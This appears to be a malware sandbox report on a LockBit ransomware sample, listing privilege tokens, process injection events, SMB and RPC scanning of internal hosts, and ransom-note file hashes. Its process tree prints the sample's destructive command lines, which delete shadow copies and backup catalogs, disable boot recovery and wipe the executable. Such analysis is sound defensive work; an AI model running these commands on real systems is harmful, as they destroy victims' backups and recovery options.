Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2712 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 2712 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 2712 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 2712 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 2020 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2020 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2020 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2020 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2020 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2020 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2712 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 2712 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 2712 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 2712 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 2712 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2060 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2060 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2060 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Network

Country Destination Domain Proto
N/A 10.127.1.229:445 tcp
N/A 10.127.1.214:445 tcp
N/A 10.127.1.199:445 tcp
N/A 10.127.1.237:445 tcp
N/A 10.127.1.234:445 tcp
N/A 10.127.1.244:445 tcp
N/A 10.127.1.193:445 tcp
N/A 10.127.1.247:445 tcp
N/A 10.127.1.235:445 tcp
N/A 10.127.1.206:445 tcp
N/A 10.127.1.219:445 tcp
N/A 10.127.1.205:445 tcp
N/A 10.127.1.212:445 tcp
N/A 10.127.1.195:445 tcp
N/A 10.127.1.187:445 tcp
N/A 10.127.1.192:445 tcp
N/A 10.127.1.254:445 tcp
N/A 10.127.1.238:445 tcp
N/A 10.127.1.190:445 tcp
N/A 10.127.1.240:445 tcp
N/A 10.127.1.236:445 tcp
N/A 10.127.1.221:445 tcp
N/A 10.127.1.227:445 tcp
N/A 10.127.1.181:445 tcp
N/A 10.127.1.250:445 tcp
N/A 10.127.1.211:445 tcp
N/A 10.127.1.196:445 tcp
N/A 10.127.1.220:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.245:445 tcp
N/A 10.127.1.230:445 tcp
N/A 10.127.1.202:445 tcp
N/A 10.127.1.225:445 tcp
N/A 10.127.1.204:445 tcp
N/A 10.127.1.228:445 tcp
N/A 10.127.1.222:445 tcp
N/A 10.127.1.183:445 tcp
N/A 10.127.1.246:445 tcp
N/A 10.127.1.210:445 tcp
N/A 10.127.1.243:445 tcp
N/A 10.127.1.216:445 tcp
N/A 10.127.1.201:445 tcp
N/A 10.127.1.191:445 tcp
N/A 10.127.1.197:445 tcp
N/A 10.127.1.200:445 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.242:445 tcp
N/A 10.127.1.252:445 tcp
N/A 10.127.1.198:445 tcp
N/A 10.127.1.194:445 tcp
N/A 10.127.1.251:445 tcp
N/A 10.127.1.241:445 tcp
N/A 10.127.1.239:445 tcp
N/A 10.127.1.217:445 tcp
N/A 10.127.1.77:445 tcp
N/A 10.127.1.231:445 tcp
N/A 10.127.1.188:445 tcp
N/A 10.127.1.223:445 tcp
N/A 10.127.1.226:445 tcp
N/A 10.127.1.189:445 tcp
N/A 10.127.1.135:445 tcp
N/A 10.127.1.249:445 tcp
N/A 10.127.1.233:445 tcp
N/A 10.127.1.208:445 tcp
N/A 10.127.1.232:445 tcp
N/A 10.127.1.182:445 tcp
N/A 10.127.1.253:445 tcp
N/A 10.127.1.209:445 tcp
N/A 10.127.1.218:445 tcp
N/A 10.127.1.207:445 tcp
N/A 10.127.1.248:445 tcp
N/A 10.127.1.224:445 tcp
N/A 10.127.1.213:445 tcp
N/A 10.127.1.142:445 tcp
N/A 10.127.1.185:445 tcp
N/A 10.127.1.215:445 tcp
N/A 10.127.1.203:445 tcp
N/A 10.127.1.164:445 tcp
N/A 10.127.1.152:445 tcp
N/A 10.127.1.146:445 tcp
N/A 10.127.1.138:445 tcp
N/A 10.127.1.136:445 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.149:445 tcp
N/A 10.127.1.154:445 tcp
N/A 10.127.1.174:445 tcp
N/A 10.127.1.180:445 tcp
N/A 10.127.1.171:445 tcp
N/A 10.127.1.132:445 tcp
N/A 10.127.1.184:445 tcp
N/A 10.127.1.173:445 tcp
N/A 10.127.1.169:445 tcp
N/A 10.127.1.163:445 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.167:445 tcp
N/A 10.127.1.160:445 tcp
N/A 10.127.1.145:445 tcp
N/A 10.127.1.141:445 tcp
N/A 10.127.1.161:445 tcp
N/A 10.127.1.134:445 tcp
N/A 10.127.1.156:445 tcp
N/A 10.127.1.151:445 tcp
N/A 10.127.1.131:445 tcp
N/A 10.127.1.178:445 tcp
N/A 10.127.1.175:445 tcp
N/A 10.127.1.143:445 tcp
N/A 10.127.1.168:445 tcp
N/A 10.127.1.147:445 tcp
N/A 10.127.1.155:445 tcp
N/A 10.127.1.148:445 tcp
N/A 10.127.1.158:445 tcp
N/A 10.127.1.159:445 tcp
N/A 10.127.1.157:445 tcp
N/A 10.127.1.144:445 tcp
N/A 10.127.1.130:445 tcp
N/A 10.127.1.176:445 tcp
N/A 10.127.1.162:445 tcp
N/A 10.127.1.153:445 tcp
N/A 10.127.1.186:445 tcp
N/A 10.127.1.179:445 tcp
N/A 10.127.1.166:445 tcp
N/A 10.127.1.137:445 tcp
N/A 10.127.1.177:445 tcp
N/A 10.127.1.139:445 tcp
N/A 10.127.1.165:445 tcp
N/A 10.127.1.170:445 tcp
N/A 10.127.1.133:445 tcp
N/A 10.127.1.150:445 tcp
N/A 10.127.1.140:445 tcp
N/A 10.127.1.172:445 tcp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.94:445 tcp
N/A 10.127.1.98:445 tcp
N/A 10.127.1.72:445 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.1.112:445 tcp
N/A 10.127.1.110:445 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.1.92:445 tcp
N/A 10.127.1.111:445 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.1.104:445 tcp
N/A 10.127.1.78:445 tcp
N/A 10.127.1.123:445 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.1.119:445 tcp
N/A 10.127.1.102:445 tcp
N/A 10.127.1.125:445 tcp
N/A 10.127.1.114:445 tcp
N/A 10.127.1.66:445 tcp
N/A 10.127.1.65:445 tcp
N/A 10.127.1.93:445 tcp
N/A 10.127.1.106:445 tcp
N/A 10.127.1.99:445 tcp
N/A 10.127.1.129:445 tcp
N/A 10.127.1.124:445 tcp
N/A 10.127.1.122:445 tcp
N/A 10.127.1.117:445 tcp
N/A 10.127.1.101:445 tcp
N/A 10.127.1.108:445 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.90:445 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.126:445 tcp
N/A 10.127.1.91:445 tcp
N/A 10.127.1.97:445 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.115:445 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.1.128:445 tcp
N/A 10.127.1.121:445 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.1.100:445 tcp
N/A 10.127.1.118:445 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.103:445 tcp
N/A 10.127.1.85:445 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.127:445 tcp
N/A 10.127.1.107:445 tcp
N/A 10.127.1.70:445 tcp
N/A 10.127.1.86:445 tcp
N/A 10.127.1.120:445 tcp
N/A 10.127.1.113:445 tcp
N/A 10.127.1.105:445 tcp
N/A 10.127.1.95:445 tcp
N/A 10.127.1.116:445 tcp
N/A 10.127.1.109:445 tcp
N/A 10.127.1.96:445 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.59:445 tcp
N/A 10.127.1.46:445 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.38:445 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.25:445 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.50:445 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.254:135 tcp
N/A 10.127.1.243:135 tcp
N/A 10.127.1.234:135 tcp
N/A 10.127.1.235:135 tcp
N/A 10.127.1.237:135 tcp
N/A 10.127.1.236:135 tcp
N/A 10.127.1.240:135 tcp
N/A 10.127.1.238:135 tcp
N/A 10.127.1.241:135 tcp
N/A 10.127.1.239:135 tcp
N/A 10.127.1.229:135 tcp
N/A 10.127.1.230:135 tcp
N/A 10.127.1.231:135 tcp
N/A 10.127.1.232:135 tcp
N/A 10.127.1.233:135 tcp
N/A 10.127.1.245:135 tcp
N/A 10.127.1.246:135 tcp
N/A 10.127.1.253:135 tcp
N/A 10.127.1.244:135 tcp
N/A 10.127.1.247:135 tcp
N/A 10.127.1.242:135 tcp
N/A 10.127.1.249:135 tcp
N/A 10.127.1.250:135 tcp
N/A 10.127.1.251:135 tcp
N/A 10.127.1.248:135 tcp
N/A 10.127.1.252:135 tcp
N/A 10.127.1.199:135 tcp
N/A 10.127.1.210:135 tcp
N/A 10.127.1.211:135 tcp
N/A 10.127.1.200:135 tcp
N/A 10.127.1.212:135 tcp
N/A 10.127.1.213:135 tcp
N/A 10.127.1.214:135 tcp
N/A 10.127.1.215:135 tcp
N/A 10.127.1.216:135 tcp
N/A 10.127.1.217:135 tcp
N/A 10.127.1.218:135 tcp
N/A 10.127.1.219:135 tcp
N/A 10.127.1.201:135 tcp
N/A 10.127.1.202:135 tcp
N/A 10.127.1.203:135 tcp
N/A 10.127.1.204:135 tcp
N/A 10.127.1.205:135 tcp
N/A 10.127.1.209:135 tcp
N/A 10.127.1.227:135 tcp
N/A 10.127.1.228:135 tcp
N/A 10.127.1.220:135 tcp
N/A 10.127.1.221:135 tcp
N/A 10.127.1.222:135 tcp
N/A 10.127.1.223:135 tcp
N/A 10.127.1.224:135 tcp
N/A 10.127.1.225:135 tcp
N/A 10.127.1.206:135 tcp
N/A 10.127.1.188:135 tcp
N/A 10.127.1.189:135 tcp
N/A 10.127.1.193:135 tcp
N/A 10.127.1.194:135 tcp
N/A 10.127.1.195:135 tcp
N/A 10.127.1.196:135 tcp
N/A 10.127.1.197:135 tcp
N/A 10.127.1.198:135 tcp
N/A 10.127.1.184:135 tcp
N/A 10.127.1.190:135 tcp
N/A 10.127.1.186:135 tcp
N/A 10.127.1.191:135 tcp
N/A 10.127.1.192:135 tcp
N/A 10.127.1.207:135 tcp
N/A 10.127.1.208:135 tcp
N/A 10.127.1.182:135 tcp
N/A 10.127.1.226:135 tcp
N/A 10.127.1.185:135 tcp
N/A 10.127.1.187:135 tcp
N/A 10.127.1.181:135 tcp
N/A 10.127.1.183:135 tcp
N/A 10.127.1.180:135 tcp
N/A 10.127.1.179:135 tcp
N/A 10.127.1.177:135 tcp
N/A 10.127.1.172:135 tcp
N/A 10.127.1.178:135 tcp
N/A 10.127.1.171:135 tcp
N/A 10.127.1.176:135 tcp
N/A 10.127.1.175:135 tcp
N/A 10.127.1.174:135 tcp
N/A 10.127.1.173:135 tcp
N/A 10.127.1.168:135 tcp
N/A 10.127.1.170:135 tcp
N/A 10.127.1.169:135 tcp
N/A 10.127.1.166:135 tcp
N/A 10.127.1.165:135 tcp
N/A 10.127.1.164:135 tcp
N/A 10.127.1.163:135 tcp
N/A 10.127.1.162:135 tcp
N/A 10.127.1.167:135 tcp
N/A 10.127.1.161:135 tcp
N/A 10.127.1.160:135 tcp
N/A 10.127.1.159:135 tcp
N/A 10.127.1.158:135 tcp
N/A 10.127.1.157:135 tcp
N/A 10.127.1.156:135 tcp
N/A 10.127.1.155:135 tcp
N/A 10.127.1.154:135 tcp
N/A 10.127.1.143:135 tcp
N/A 10.127.1.142:135 tcp
N/A 10.127.1.141:135 tcp
N/A 10.127.1.140:135 tcp
N/A 10.127.1.139:135 tcp
N/A 10.127.1.137:135 tcp
N/A 10.127.1.118:135 tcp
N/A 10.127.1.153:135 tcp
N/A 10.127.1.123:135 tcp
N/A 10.127.1.124:135 tcp
N/A 10.127.1.125:135 tcp
N/A 10.127.1.126:135 tcp
N/A 10.127.1.151:135 tcp
N/A 10.127.1.150:135 tcp
N/A 10.127.1.149:135 tcp
N/A 10.127.1.148:135 tcp
N/A 10.127.1.147:135 tcp
N/A 10.127.1.146:135 tcp
N/A 10.127.1.145:135 tcp
N/A 10.127.1.144:135 tcp
N/A 10.127.1.138:135 tcp
N/A 10.127.1.152:135 tcp
N/A 10.127.1.136:135 tcp
N/A 10.127.1.135:135 tcp
N/A 10.127.1.134:135 tcp
N/A 10.127.1.133:135 tcp
N/A 10.127.1.132:135 tcp
N/A 10.127.1.131:135 tcp
N/A 10.127.1.130:135 tcp
N/A 10.127.1.129:135 tcp
N/A 10.127.1.128:135 tcp
N/A 10.127.1.119:135 tcp
N/A 10.127.1.120:135 tcp
N/A 10.127.1.121:135 tcp
N/A 10.127.1.127:135 tcp
N/A 10.127.1.105:135 tcp
N/A 10.127.1.108:135 tcp
N/A 10.127.1.112:135 tcp
N/A 10.127.1.113:135 tcp
N/A 10.127.1.114:135 tcp
N/A 10.127.1.116:135 tcp
N/A 10.127.1.106:135 tcp
N/A 10.127.1.109:135 tcp
N/A 10.127.1.110:135 tcp
N/A 10.127.1.111:135 tcp
N/A 10.127.1.115:135 tcp
N/A 10.127.1.117:135 tcp
N/A 10.127.1.122:135 tcp
N/A 10.127.1.107:135 tcp
N/A 10.127.1.86:135 tcp
N/A 10.127.1.90:135 tcp
N/A 10.127.1.91:135 tcp
N/A 10.127.1.92:135 tcp
N/A 10.127.1.93:135 tcp
N/A 10.127.1.94:135 tcp
N/A 10.127.1.87:135 tcp
N/A 10.127.1.88:135 tcp
N/A 10.127.1.89:135 tcp
N/A 10.127.1.95:135 tcp
N/A 10.127.1.96:135 tcp
N/A 10.127.1.98:135 tcp
N/A 10.127.1.101:135 tcp
N/A 10.127.1.102:135 tcp
N/A 10.127.1.104:135 tcp
N/A 10.127.1.97:135 tcp
N/A 10.127.1.99:135 tcp
N/A 10.127.1.100:135 tcp
N/A 10.127.1.103:135 tcp
N/A 10.127.1.72:135 tcp
N/A 10.127.1.73:135 tcp
N/A 10.127.1.74:135 tcp
N/A 10.127.1.75:135 tcp
N/A 10.127.1.76:135 tcp
N/A 10.127.1.81:135 tcp
N/A 10.127.1.82:135 tcp
N/A 10.127.1.83:135 tcp
N/A 10.127.1.84:135 tcp
N/A 10.127.1.85:135 tcp
N/A 10.127.1.77:135 tcp
N/A 10.127.1.78:135 tcp
N/A 10.127.1.79:135 tcp
N/A 10.127.1.80:135 tcp
N/A 10.127.1.61:135 tcp
N/A 10.127.1.64:135 tcp
N/A 10.127.1.65:135 tcp
N/A 10.127.1.66:135 tcp
N/A 10.127.1.67:135 tcp
N/A 10.127.1.68:135 tcp
N/A 10.127.1.69:135 tcp
N/A 10.127.1.70:135 tcp
N/A 10.127.1.71:135 tcp
N/A 10.127.1.60:135 tcp
N/A 10.127.1.62:135 tcp
N/A 10.127.1.63:135 tcp
N/A 10.127.1.45:135 tcp
N/A 10.127.1.49:135 tcp
N/A 10.127.1.50:135 tcp
N/A 10.127.1.51:135 tcp
N/A 10.127.1.52:135 tcp
N/A 10.127.1.55:135 tcp
N/A 10.127.1.56:135 tcp
N/A 10.127.1.59:135 tcp
N/A 10.127.1.46:135 tcp
N/A 10.127.1.47:135 tcp
N/A 10.127.1.48:135 tcp
N/A 10.127.1.53:135 tcp
N/A 10.127.1.54:135 tcp
N/A 10.127.1.57:135 tcp
N/A 10.127.1.58:135 tcp
N/A 10.127.1.34:135 tcp
N/A 10.127.1.40:135 tcp
N/A 10.127.1.41:135 tcp
N/A 10.127.1.42:135 tcp
N/A 10.127.1.43:135 tcp
N/A 10.127.1.44:135 tcp
N/A 10.127.1.33:135 tcp
N/A 10.127.1.35:135 tcp
N/A 10.127.1.36:135 tcp
N/A 10.127.1.26:135 tcp
N/A 10.127.1.30:135 tcp
N/A 10.127.1.31:135 tcp
N/A 10.127.1.32:135 tcp
N/A 10.127.1.37:135 tcp
N/A 10.127.1.38:135 tcp
N/A 10.127.1.39:135 tcp
N/A 10.127.1.25:135 tcp
N/A 10.127.1.27:135 tcp
N/A 10.127.1.28:135 tcp
N/A 10.127.1.29:135 tcp
N/A 10.127.1.6:135 tcp
N/A 10.127.1.7:135 tcp
N/A 10.127.1.8:135 tcp
N/A 10.127.1.9:135 tcp
N/A 10.127.1.10:135 tcp
N/A 10.127.1.11:135 tcp
N/A 10.127.1.18:135 tcp
N/A 10.127.1.19:135 tcp
N/A 10.127.1.20:135 tcp
N/A 10.127.1.22:135 tcp
N/A 10.127.1.23:135 tcp
N/A 10.127.1.24:135 tcp
N/A 10.127.1.2:135 tcp
N/A 10.127.1.4:135 tcp
N/A 10.127.1.5:135 tcp
N/A 10.127.1.12:135 tcp
N/A 10.127.1.13:135 tcp
N/A 10.127.1.14:135 tcp
N/A 10.127.1.15:135 tcp
N/A 10.127.1.1:135 tcp
N/A 10.127.1.16:135 tcp
N/A 10.127.1.17:135 tcp
N/A 10.127.1.21:135 tcp
N/A 10.127.1.0:135 tcp

Files

C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt

MD5 f1f9fa7e0ac011f93ea508f6c0c595ef
SHA1 933ec77d7416e7cbb2d3e30a2250da2259112679
SHA256 54bb61b3fa4c51f7a518089987984e77ca4eb2ab4776fa458cb986dff1ddf816
SHA512 b96b3c5eb97484762a0cb52193ffb900d336edda4034bd57480f9f6e1b38bd2455eef9d058b24ca4b6da10df6b83c1fba549235428614f72df23532a28774fc7

C:\Users\Admin\Desktop\LockBit-note.hta

MD5 83b62f624992a5ac6afb087554d25c31
SHA1 5bf1c39eb8208e2a48dc6d9fc6f8f6f270e2bcde
SHA256 1e5f657e4ee5ec3beb3ffe32e4a514194e5617da74aec07eadd587670cf63a8b
